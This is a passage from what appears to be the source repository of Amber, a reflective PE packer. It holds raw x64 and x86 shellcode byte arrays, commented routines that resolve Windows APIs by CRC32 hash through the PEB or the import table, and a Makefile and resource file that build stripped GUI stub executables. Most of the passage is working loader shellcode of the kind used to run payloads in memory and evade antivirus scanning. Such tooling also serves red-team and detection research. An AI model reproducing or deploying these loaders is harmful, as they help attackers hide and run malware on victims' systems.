	0xe7, 0xb9, 0x01, 0x00, 0x00, 0x00, 0x89, 0xc8, 0xc3, 0x41, 0x54, 0x55,
	0x57, 0x56, 0x53, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0xcd, 0x48, 0x63,
	0x41, 0x3c, 0x8b, 0x84, 0x01, 0x90, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00,
	0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xb0, 0x00, 0x00, 0x00, 0x89, 0xc0,
	0x4c, 0x8d, 0x24, 0x01, 0x41, 0x8b, 0x4c, 0x24, 0x0c, 0x85, 0xc9, 0x75,
	0x6a, 0xba, 0x01, 0x00, 0x00, 0x00, 0xe9, 0x97, 0x00, 0x00, 0x00, 0xba,
	0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xf9, 0xe8, 0x97, 0x00, 0x00, 0x00,
	0x48, 0x85, 0xc0, 0x74, 0x03, 0x48, 0x89, 0x06, 0x48, 0x83, 0xc3, 0x08,
	0x48, 0x83, 0xc6, 0x08, 0x4c, 0x8b, 0x03, 0x4d, 0x85, 0xc0, 0x74, 0x2e,
	0x4d, 0x85, 0xc0, 0x78, 0xd6, 0x4a, 0x8d, 0x4c, 0x05, 0x02, 0xba, 0x00,
	0x00, 0x00, 0x00, 0xe8, 0xde, 0xfc, 0xff, 0xff, 0x89, 0xc2, 0x41, 0xb8,
	0xff, 0xff, 0xff, 0xff, 0x48, 0x89, 0xf9, 0xe8, 0x5b, 0x00, 0x00, 0x00,
	0x48, 0x85, 0xc0, 0x74, 0xc7, 0x48, 0x89, 0x06, 0xeb, 0xc2, 0x49, 0x83,
	0xc4, 0x14, 0x41, 0x8b, 0x4c, 0x24, 0x0c, 0x85, 0xc9, 0x74, 0x2b, 0x89,
	0xc9, 0x48, 0x01, 0xe9, 0xe8, 0xd2, 0xfd, 0xff, 0xff, 0x48, 0x89, 0xc7,
	0x48, 0x85, 0xc0, 0x74, 0x20, 0x41, 0x8b, 0x1c, 0x24, 0x48, 0x01, 0xeb,
	0x41, 0x8b, 0x74, 0x24, 0x10, 0x48, 0x01, 0xee, 0x4c, 0x8b, 0x03, 0x4d,
	0x85, 0xc0, 0x75, 0x9c, 0xeb, 0xc8, 0xba, 0x01, 0x00, 0x00, 0x00, 0xeb,
	0x05, 0xba, 0x00, 0x00, 0x00, 0x00, 0x89, 0xd0, 0x48, 0x83, 0xc4, 0x20,
	0x5b, 0x5e, 0x5f, 0x5d, 0x41, 0x5c, 0xc3, 0x41, 0x57, 0x41, 0x56, 0x41,
	0x55, 0x41, 0x54, 0x55, 0x57, 0x56, 0x53, 0x48, 0x81, 0xec, 0x58, 0x02,
	0x00, 0x00, 0x48, 0x89, 0xcb, 0x41, 0x89, 0xd5, 0x44, 0x89, 0xc5, 0x48,
	0x63, 0x41, 0x3c, 0x48, 0x01, 0xc8, 0x8b, 0xb0, 0x88, 0x00, 0x00, 0x00,
	0x48, 0x01, 0xce, 0x8b, 0x80, 0x8c, 0x00, 0x00, 0x00, 0x89, 0x44, 0x24,
	0x2c, 0x44, 0x8b, 0x66, 0x20, 0x44, 0x8b, 0x76, 0x1c, 0x44, 0x8b, 0x7e,
	0x24, 0x8b, 0x46, 0x18, 0x85, 0xc0, 0x0f, 0x84, 0x97, 0x01, 0x00, 0x00,
	0x89, 0xc0, 0x48, 0x89, 0x44, 0x24, 0x20, 0xbf, 0x00, 0x00, 0x00, 0x00,
	0x49, 0x01, 0xcc, 0x41, 0x8b, 0x0c, 0xbc, 0x48, 0x01, 0xd9, 0xba, 0x00,
	0x00, 0x00, 0x00, 0xe8, 0x06, 0xfc, 0xff, 0xff, 0x39, 0xfd, 0x74, 0x1a,
	0x44, 0x39, 0xe8, 0x74, 0x15, 0x48, 0x83, 0xc7, 0x01, 0x48, 0x39, 0x7c,
	0x24, 0x20, 0x75, 0xdb, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x2d, 0x01,
	0x00, 0x00, 0x48, 0x8d, 0x04, 0x7b, 0x42, 0x0f, 0xb7, 0x04, 0x38, 0x48,
	0x8d, 0x04, 0x83, 0x42, 0x8b, 0x04, 0x30, 0x48, 0x01, 0xc3, 0x48, 0x39,
	0xf3, 0x0f, 0x82, 0x0d, 0x01, 0x00, 0x00, 0x8b, 0x44, 0x24, 0x2c, 0x48,
	0x01, 0xc6, 0x48, 0x39, 0xf3, 0x0f, 0x83, 0xfd, 0x00, 0x00, 0x00, 0x48,
	0xc7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24,
	0x38, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x7c, 0x24, 0x40, 0xb8, 0x00,
	0x00, 0x00, 0x00, 0xb9, 0x1e, 0x00, 0x00, 0x00, 0xf3, 0x48, 0xab, 0xc7,
	0x07, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x84, 0x24, 0x40, 0x01, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x84, 0x24, 0x48, 0x01, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0xbc, 0x24, 0x50, 0x01, 0x00,
	0x00, 0xb9, 0x1e, 0x00, 0x00, 0x00, 0xf3, 0x48, 0xab, 0xc7, 0x07, 0x00,
	0x00, 0x00, 0x00, 0x80, 0x3b, 0x2e, 0x0f, 0x84, 0xb3, 0x00, 0x00, 0x00,
	0xb8, 0x01, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x48, 0x83, 0xc0, 0x01,
	0x80, 0x7c, 0x03, 0xff, 0x2e, 0x75, 0xf2, 0x44, 0x89, 0xc6, 0x48, 0x8d,
	0x4c, 0x24, 0x30, 0x48, 0x89, 0xda, 0xe8, 0x27, 0xfb, 0xff, 0xff, 0x8d,
	0x4e, 0x01, 0x48, 0x63, 0xc9, 0x48, 0x01, 0xd9, 0x80, 0x39, 0x00, 0x0f,
	0x84, 0x8e, 0x00, 0x00, 0x00, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x63,
	0xd6, 0x48, 0x01, 0xda, 0x49, 0x89, 0xc0, 0x48, 0x83, 0xc0, 0x01, 0x80,
	0x3c, 0x02, 0x00, 0x75, 0xf3, 0x48, 0x8d, 0x84, 0x24, 0x40, 0x01, 0x00,
	0x00, 0x48, 0x89, 0xca, 0x48, 0x89, 0xc1, 0xe8, 0xea, 0xfa, 0xff, 0xff,
	0x48, 0x8d, 0x4c, 0x24, 0x30, 0xe8, 0x15, 0xfc, 0xff, 0xff, 0x48, 0x89,
	0xc3, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x85, 0xdb, 0x74, 0x28, 0x48,
	0x8d, 0x8c, 0x24, 0x40, 0x01, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00,
	0xe8, 0xd1, 0xfa, 0xff, 0xff, 0x89, 0xc2, 0x41, 0xb8, 0xff, 0xff, 0xff,
	0xff, 0x48, 0x89, 0xd9, 0xe8, 0x4e, 0xfe, 0xff, 0xff, 0x48, 0x89, 0xc3,
	0x48, 0x89, 0xd8, 0x48, 0x81, 0xc4, 0x58, 0x02, 0x00, 0x00, 0x5b, 0x5e,
	0x5f, 0x5d, 0x41, 0x5c, 0x41, 0x5d, 0x41, 0x5e, 0x41, 0x5f, 0xc3, 0xbe,
	0x00, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x53,
	0xff, 0xff, 0xff, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x82, 0xb8,
	0x00, 0x00, 0x00, 0x00, 0xeb, 0xcd, 0x57, 0x56, 0x53, 0x48, 0x83, 0xec,
	0x20, 0x89, 0xce, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x60, 0x00, 0x00, 0x00,
	0x48, 0x8b, 0x40, 0x18, 0x48, 0x8d, 0x78, 0x20, 0x48, 0x8b, 0x58, 0x20,
	0x48, 0x39, 0xdf, 0x74, 0x2c, 0x0f, 0xb7, 0x53, 0x48, 0x48, 0x8b, 0x4b,
	0x50, 0xe8, 0x58, 0xfa, 0xff, 0xff, 0x39, 0xf0, 0x74, 0x0f, 0x48, 0x8b,
	0x1b, 0x48, 0x39, 0xdf, 0x75, 0xe7, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb,
	0x04, 0x48, 0x8b, 0x43, 0x20, 0x48, 0x83, 0xc4, 0x20, 0x5b, 0x5e, 0x5f,
	0xc3, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0xf1, 0x41, 0x56, 0x41, 0x55,
	0x41, 0x54, 0x55, 0x57, 0x56, 0x53, 0x48, 0x83, 0xec, 0x50, 0x48, 0x89,
	0xcd, 0x48, 0x63, 0x79, 0x3c, 0x48, 0x01, 0xcf, 0x0f, 0xb7, 0x47, 0x14,
	0x48, 0x8d, 0x5c, 0x07, 0x18, 0x48, 0xc7, 0x44, 0x24, 0x48, 0x00, 0x00,
	0x00, 0x00, 0x66, 0x83, 0x7f, 0x06, 0x00, 0x74, 0x69, 0xbe, 0x00, 0x00,
	0x00, 0x00, 0x41, 0xbc, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x74, 0x24,
	0x40, 0x4c, 0x8d, 0x6c, 0x24, 0x48, 0xe9, 0x25, 0x01, 0x00, 0x00, 0xb9,
	0x01, 0x00, 0x00, 0x00, 0x25, 0x00, 0x00, 0x00, 0x60, 0x41, 0xb8, 0x01,
	0x00, 0x00, 0x00, 0x3d, 0x00, 0x00, 0x00, 0x60, 0x41, 0xb9, 0x20, 0x00,
	0x00, 0x00, 0xb8, 0x80, 0x00, 0x00, 0x00, 0x44, 0x0f, 0x45, 0xc8, 0xe9,
	0x8c, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x20, 0x00, 0x00, 0x00, 0xe9, 0x91,
	0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x05, 0xb8, 0x01,
	0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x50, 0x5b, 0x5e, 0x5f, 0x5d, 0x41,
	0x5c, 0x41, 0x5d, 0x41, 0x5e, 0xc3, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb,
	0xea, 0xb9, 0x01, 0x00, 0x00, 0x00, 0x45, 0x89, 0xe0, 0x41, 0xb9, 0x10,
	0x00, 0x00, 0x00, 0xeb, 0x3f, 0x44, 0x89, 0xe1, 0xa9, 0x00, 0x00, 0x00,
	0x20, 0x74, 0x32, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x78, 0x8c,
	0x89, 0xc1, 0xc1, 0xe9, 0x1f, 0x41, 0x89, 0xc8, 0x44, 0x89, 0xe1, 0x41,
	0xb9, 0x10, 0x00, 0x00, 0x00, 0xeb, 0x19, 0xa9, 0x00, 0x00, 0x00, 0x20,
	0x0f, 0x85, 0x69, 0xff, 0xff, 0xff, 0xb9, 0x01, 0x00, 0x00, 0x00, 0x41,
	0xb9, 0x04, 0x00, 0x00, 0x00, 0x45, 0x89, 0xe0, 0x25, 0x00, 0x00, 0x00,
	0x60, 0x3d, 0x00, 0x00, 0x00, 0x60, 0x0f, 0x84, 0x74, 0xff, 0xff, 0xff,
	0x84, 0xc9, 0x74, 0x0c, 0x45, 0x84, 0xc0, 0xb8, 0x40, 0x00, 0x00, 0x00,
	0x44, 0x0f, 0x45, 0xc8, 0x8b, 0x42, 0x0c, 0x48, 0x01, 0xe8, 0x48, 0x89,
	0x44, 0x24, 0x48, 0x8b, 0x42, 0x10, 0x48, 0x89, 0x44, 0x24, 0x40, 0xc7,
	0x44, 0x24, 0x3c, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x44, 0x24, 0x3c,
	0x48, 0x89, 0x44, 0x24, 0x20, 0x4d, 0x89, 0xf0, 0x4c, 0x89, 0xea, 0x48,
	0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0x41, 0xba, 0x41, 0x4d, 0xde, 0x6e,
	0xe8, 0xc4, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc2, 0xe8, 0x76, 0x01, 0x00,
	0x00, 0x85, 0xc0, 0x0f, 0x88, 0x22, 0xff, 0xff, 0xff, 0x83, 0xc6, 0x01,
	0x48, 0x83, 0xc3, 0x28, 0x0f, 0xb7, 0x47, 0x06, 0x39, 0xf0, 0x0f, 0x8e,
	0x16, 0xff, 0xff, 0xff, 0x48, 0x89, 0xda, 0x8b, 0x43, 0x24, 0x85, 0xc0,
	0x74, 0xe3, 0x41, 0x89, 0xc1, 0x41, 0xc1, 0xf9, 0x1f, 0x41, 0x83, 0xe1,
	0xc8, 0x41, 0x83, 0xc1, 0x40, 0xa9, 0x00, 0x00, 0x00, 0x40, 0x0f, 0x84,
	0x1d, 0xff, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x88, 0x3b, 0xff, 0xff, 0xff,
	0xa9, 0x00, 0x00, 0x00, 0x20, 0x0f, 0x85, 0xfa, 0xfe, 0xff, 0xff, 0xb9,
	0x01, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x02, 0x00, 0x00, 0x00, 0xe9, 0x36,
	0xff, 0xff, 0xff, 0x56, 0x53, 0x48, 0x83, 0xec, 0x28, 0x48, 0x89, 0xce,
	0x48, 0x63, 0x41, 0x3c, 0x8b, 0x84, 0x01, 0xd0, 0x00, 0x00, 0x00, 0xba,
	0x00, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x11, 0x89, 0xc0, 0x48, 0x8b,
	0x5c, 0x01, 0x18, 0xba, 0x01, 0x00, 0x00, 0x00, 0x48, 0x85, 0xdb, 0x75,
	0x1d, 0x89, 0xd0, 0x48, 0x83, 0xc4, 0x28, 0x5b, 0x5e, 0xc3, 0x41, 0xb8,
	0x00, 0x00, 0x00, 0x00, 0xba, 0x01, 0x00, 0x00, 0x00, 0x48, 0x89, 0xf1,
	0xff, 0xd0, 0x48, 0x83, 0xc3, 0x08, 0x48, 0x8b, 0x03, 0x48, 0x85, 0xc0,
	0x75, 0xe4, 0xba, 0x01, 0x00, 0x00, 0x00, 0xeb, 0xd4, 0x41, 0x51, 0x41,
	0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60,
	0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50,
	0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac,
	0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xf2, 0x44, 0x0f, 0x38, 0xf0, 0xc8,
	0xe2, 0xee, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c,
	0x48, 0x01, 0xd0, 0x66, 0x81, 0x78, 0x18, 0x0b, 0x02, 0x75, 0x65, 0x8b,
	0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x5a, 0x48, 0x01,
	0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0,
	0xe3, 0x49, 0x4c, 0x8b, 0x4c, 0x24, 0x08, 0x48, 0xff, 0xc9, 0x41, 0x8b,
	0x34, 0x88, 0x48, 0x01, 0xd6, 0x48, 0x31, 0xc0, 0xac, 0xf2, 0x44, 0x0f,
	0x38, 0xf0, 0xc8, 0x38, 0xe0, 0x75, 0xf2, 0x45, 0x39, 0xd1, 0x75, 0xdc,
	0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c,
	0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88,
	0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58,
	0x41, 0x59, 0xc3, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x5d,
	0xff, 0xff, 0xff, 0xe8, 0x14, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74,
	0x06, 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3, 0x4d, 0x31, 0xd2, 0x49, 0xff,
	0xca, 0x41, 0x53, 0xc3, 0x51, 0x55, 0x48, 0x89, 0xe5, 0x4c, 0x89, 0xd1,
	0x41, 0x52, 0x49, 0x83, 0xc2, 0x64, 0x4c, 0x39, 0xd1, 0x7f, 0x2a, 0x8b,
	0x01, 0xc1, 0xe0, 0x08, 0x3d, 0x00, 0x0f, 0x05, 0xc3, 0x74, 0x05, 0x48,
	0xff, 0xc1, 0xeb, 0xea, 0x41, 0x5a, 0x4c, 0x39, 0xd1, 0x7c, 0x12, 0x48,
	0x8b, 0x01, 0x3d, 0x4c, 0x8b, 0xd1, 0xb8, 0x74, 0x02, 0xe2, 0xef, 0x48,
	0xc1, 0xe8, 0x20, 0xeb, 0x03, 0x48, 0x31, 0xc0, 0x48, 0x89, 0xec, 0x5d,
	0x59, 0xc3, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x59, 0x48, 0x29, 0xf1, 0x48,
	0x83, 0xc1, 0x14, 0x48, 0x89, 0xf7, 0x48, 0x83, 0xef, 0x05, 0xf3, 0xaa,
	0xfc, 0x48, 0x89, 0xec, 0x5d, 0xff, 0xe0,
}
579 |
// CRC_API_64 is the x64 API-resolution routine emitted when the payload's
// imports are resolved by hash rather than by name. Decoding the bytes: it
// walks the PEB loader list (65 48 8b 52 60 = mov rdx, gs:[rdx+0x60]) and
// compares module/export names against a CRC32 computed with the SSE4.2
// crc32 instruction (f2 44 0f 38 f0 c8 = crc32 r9d, al), so it needs SSE4.2
// at run time. The 45 39 d1 (cmp r9d, r10d) suggests the target hash is
// expected in r10d on entry — confirm against loader/*/inc/get_proc_by_crc.asm.
// Generated blob: rebuild from the .asm instead of editing bytes.
var CRC_API_64 = []byte{
	0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48,
	0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48,
	0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x41,
	0xb9, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c,
	0x02, 0x2c, 0x20, 0xf2, 0x44, 0x0f, 0x38, 0xf0, 0xc8, 0xe2, 0xee, 0x52,
	0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0,
	0x66, 0x81, 0x78, 0x18, 0x0b, 0x02, 0x75, 0x65, 0x8b, 0x80, 0x88, 0x00,
	0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x5a, 0x48, 0x01, 0xd0, 0x50, 0x8b,
	0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x49, 0x4c,
	0x8b, 0x4c, 0x24, 0x08, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48,
	0x01, 0xd6, 0x48, 0x31, 0xc0, 0xac, 0xf2, 0x44, 0x0f, 0x38, 0xf0, 0xc8,
	0x38, 0xe0, 0x75, 0xf2, 0x45, 0x39, 0xd1, 0x75, 0xdc, 0x58, 0x44, 0x8b,
	0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b,
	0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0,
	0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0xc3,
	0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff,
}
598 |
// CRC_API_32 is the x86 counterpart of CRC_API_64. Decoding the bytes: pushad,
// then the PEB is read via fs:[0x30] (64 8b 50 30) and names are hashed with
// the SSE4.2 crc32 instruction (f2 0f 38 f0 f8 = crc32 edi, al), so the same
// SSE4.2 requirement applies. The result appears to be stored into the saved
// eax slot of the pushad frame (89 44 24 24) so that popad returns it in eax.
// Generated blob: rebuild from the .asm instead of editing bytes.
var CRC_API_32 = []byte{
	0x60, 0x89, 0xe5, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30, 0x8b, 0x52, 0x0c,
	0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff,
	0xbf, 0x00, 0x00, 0x00, 0x00, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20,
	0xf2, 0x0f, 0x38, 0xf0, 0xf8, 0xe2, 0xf2, 0x52, 0x57, 0x8b, 0x52, 0x10,
	0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78, 0xe3, 0x42, 0x01, 0xd1, 0x51,
	0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49, 0x18, 0xe3, 0x34, 0x8b, 0x7d,
	0xf8, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0xac, 0xf2, 0x0f, 0x38, 0xf0,
	0xf8, 0x38, 0xe0, 0x75, 0xf6, 0x3b, 0x7d, 0x24, 0x75, 0xe6, 0x58, 0x8b,
	0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01,
	0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b,
	0x61, 0xc3, 0x5f, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x8e,
}
612 |
// IAT_API_64 resolves an API by CRC32 hash through the running image's own
// import table instead of module export tables. Decoding the bytes: it reads
// the import data-directory RVA at offset 0x90 of the NT headers
// (8b 92 90 00 00 00; 0x18 + 0x78 is that slot in a PE32+ optional header)
// and hashes each imported name with SSE4.2 crc32 (f2 0f 38 f0 f8), so it
// needs SSE4.2 and can only find APIs the host image already imports —
// presumably why stub/stub.c references LoadLibrary/GetProcAddress "just for
// the imports". Generated blob: rebuild from the .asm instead of editing bytes.
var IAT_API_64 = []byte{
	0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48,
	0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48,
	0x8b, 0x52, 0x20, 0x52, 0x66, 0x03, 0x52, 0x3c, 0x8b, 0x92, 0x90, 0x00,
	0x00, 0x00, 0x48, 0x03, 0x14, 0x24, 0x52, 0x48, 0x8b, 0x74, 0x24, 0x08,
	0x48, 0x83, 0xec, 0x10, 0x48, 0x83, 0xea, 0x14, 0x48, 0x83, 0xc2, 0x14,
	0x83, 0x3a, 0x00, 0x0f, 0x84, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x74,
	0x24, 0x10, 0x66, 0x8b, 0x72, 0x0c, 0x48, 0x31, 0xff, 0x48, 0x31, 0xc0,
	0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xf2, 0x0f, 0x38, 0xf0, 0xf8,
	0xf2, 0x0f, 0x38, 0xf0, 0xfc, 0x84, 0xc0, 0x75, 0xe8, 0x48, 0x89, 0x54,
	0x24, 0x08, 0x89, 0x3c, 0x24, 0x8b, 0x0a, 0x48, 0x03, 0x4c, 0x24, 0x18,
	0x48, 0x83, 0xe9, 0x08, 0x48, 0x8b, 0x3c, 0x24, 0x48, 0x83, 0xc1, 0x08,
	0x83, 0x39, 0x00, 0x74, 0xaf, 0x8b, 0x31, 0x48, 0x0f, 0xba, 0xf6, 0x3f,
	0x72, 0xea, 0x48, 0x03, 0x74, 0x24, 0x18, 0x48, 0x83, 0xc6, 0x02, 0x48,
	0x31, 0xc0, 0xac, 0xf2, 0x0f, 0x38, 0xf0, 0xf8, 0x38, 0xe0, 0x75, 0xf3,
	0x44, 0x39, 0xd7, 0x75, 0xcf, 0x8b, 0x42, 0x10, 0x8b, 0x12, 0x48, 0x03,
	0x54, 0x24, 0x18, 0x48, 0x29, 0xd1, 0x48, 0x03, 0x44, 0x24, 0x18, 0x48,
	0x01, 0xc8, 0x41, 0x58, 0x41, 0x58, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59,
	0x5a, 0x41, 0x58, 0x41, 0x59, 0x48, 0x8b, 0x00, 0xc3, 0x48, 0x83, 0xc4,
	0x48, 0xc3,
}
634 |
// IAT_API_32 is the x86 counterpart of IAT_API_64. Decoding the bytes: pushad,
// PEB via fs:[0x30] (64 8b 50 30), import data-directory RVA read at offset
// 0x80 of the NT headers (8b 92 80 00 00 00; 0x18 + 0x68 in a PE32 optional
// header), names hashed with SSE4.2 crc32 (f2 0f 38 f0 f8). Same constraints
// as the 64-bit version: SSE4.2 required, only already-imported APIs are
// found. Generated blob: rebuild from the .asm instead of editing bytes.
var IAT_API_32 = []byte{
	0x60, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52,
	0x14, 0x8b, 0x52, 0x10, 0x52, 0x03, 0x52, 0x3c, 0x8b, 0x92, 0x80, 0x00,
	0x00, 0x00, 0x03, 0x14, 0x24, 0x52, 0x8b, 0x74, 0x24, 0x04, 0x83, 0xec,
	0x08, 0x83, 0xea, 0x14, 0x83, 0xc2, 0x14, 0x83, 0x3a, 0x00, 0x74, 0x77,
	0x8b, 0x74, 0x24, 0x08, 0x66, 0x8b, 0x72, 0x0c, 0x31, 0xff, 0xac, 0x3c,
	0x61, 0x7c, 0x02, 0x2c, 0x20, 0xf2, 0x0f, 0x38, 0xf0, 0xf8, 0xf2, 0x0f,
	0x38, 0xf0, 0xfc, 0x84, 0xc0, 0x75, 0xeb, 0x89, 0x54, 0x24, 0x04, 0x89,
	0x3c, 0x24, 0x8b, 0x0a, 0x03, 0x4c, 0x24, 0x0c, 0x83, 0xe9, 0x04, 0x8b,
	0x3c, 0x24, 0x83, 0xc1, 0x04, 0x83, 0x39, 0x00, 0x74, 0xbe, 0x8b, 0x31,
	0x81, 0xfe, 0x00, 0x00, 0x00, 0x80, 0x79, 0xeb, 0x03, 0x74, 0x24, 0x0c,
	0x83, 0xc6, 0x02, 0xac, 0xf2, 0x0f, 0x38, 0xf0, 0xf8, 0x84, 0xc0, 0x75,
	0xf6, 0x3b, 0x7c, 0x24, 0x34, 0x75, 0xd4, 0x8b, 0x42, 0x10, 0x8b, 0x12,
	0x03, 0x54, 0x24, 0x0c, 0x29, 0xd1, 0x03, 0x44, 0x24, 0x0c, 0x01, 0xc8,
	0x89, 0x44, 0x24, 0x2c, 0x83, 0xc4, 0x10, 0x61, 0x8b, 0x00, 0xc3, 0x83,
	0xc4, 0x0f, 0x61, 0xc3,
}
652 |
--------------------------------------------------------------------------------
/stub/Makefile:
--------------------------------------------------------------------------------
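# Builds the two stub executables the packer embeds: stub32.exe (i686) and
# stub.exe (x86_64). Each build first compiles the version/icon resource with
# windres, then compiles stub.c with the C++ front end (so the source is built
# as C++), links it as a GUI-subsystem binary (no console window) and strips
# symbols. Both arches share the res.o/stub.o scratch names; that is safe only
# because the recipe is strictly sequential.
#
# "normal" is declared .PHONY so a stray file of that name cannot make the
# target silently up-to-date, and the cleanup uses rm -f so a partial run does
# not fail on missing objects.
.PHONY: normal

normal:
	i686-w64-mingw32-windres Resource.rc -o res.o
	i686-w64-mingw32-g++-win32 -c stub.c -o stub.o
	i686-w64-mingw32-g++-win32 -Wl,--subsystem,windows stub.o res.o -o stub32.exe
	i686-w64-mingw32-strip stub32.exe
	x86_64-w64-mingw32-windres Resource.rc -o res.o
	x86_64-w64-mingw32-g++-win32 -c stub.c -o stub.o
	x86_64-w64-mingw32-g++-win32 -Wl,--subsystem,windows stub.o res.o -o stub.exe
	x86_64-w64-mingw32-strip stub.exe
	rm -f *.o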
11 |
--------------------------------------------------------------------------------
/stub/Resource.rc:
--------------------------------------------------------------------------------
// Icon and version resource compiled into the stub executables by
// stub/Makefile (windres). The StringFileInfo values are what Explorer shows
// in the file's Properties dialog; they are cosmetic and have no effect on
// how the stub runs.
id ICON "amber.ico"
2 VERSIONINFO
FILEVERSION 2,1,0,0
PRODUCTVERSION 2,1,0,0
BEGIN
BLOCK "StringFileInfo"
BEGIN
// 0809 = English (UK), 04E4 = Windows-1252; must match the Translation
// value in VarFileInfo below.
BLOCK "080904E4"
BEGIN
VALUE "CompanyName", "PRODAFT"
VALUE "FileDescription", "Amber - Reflective PE Packer"
VALUE "FileVersion", "2.1"
VALUE "InternalName", "AMBER"
VALUE "LegalCopyright", "Ege Balci"
VALUE "OriginalFilename", "amber.exe"
VALUE "ProductName", "AMBER - Reflective PE Packer"
// NOTE(review): "3.0.0" disagrees with PRODUCTVERSION 2,1,0,0 and
// FileVersion "2.1" above — confirm which is current and align them.
VALUE "ProductVersion", "3.0.0"
END
END
BLOCK "VarFileInfo"
BEGIN
VALUE "Translation", 0x809, 1252
END
END
25 |
--------------------------------------------------------------------------------
/stub/amber.ico:
--------------------------------------------------------------------------------
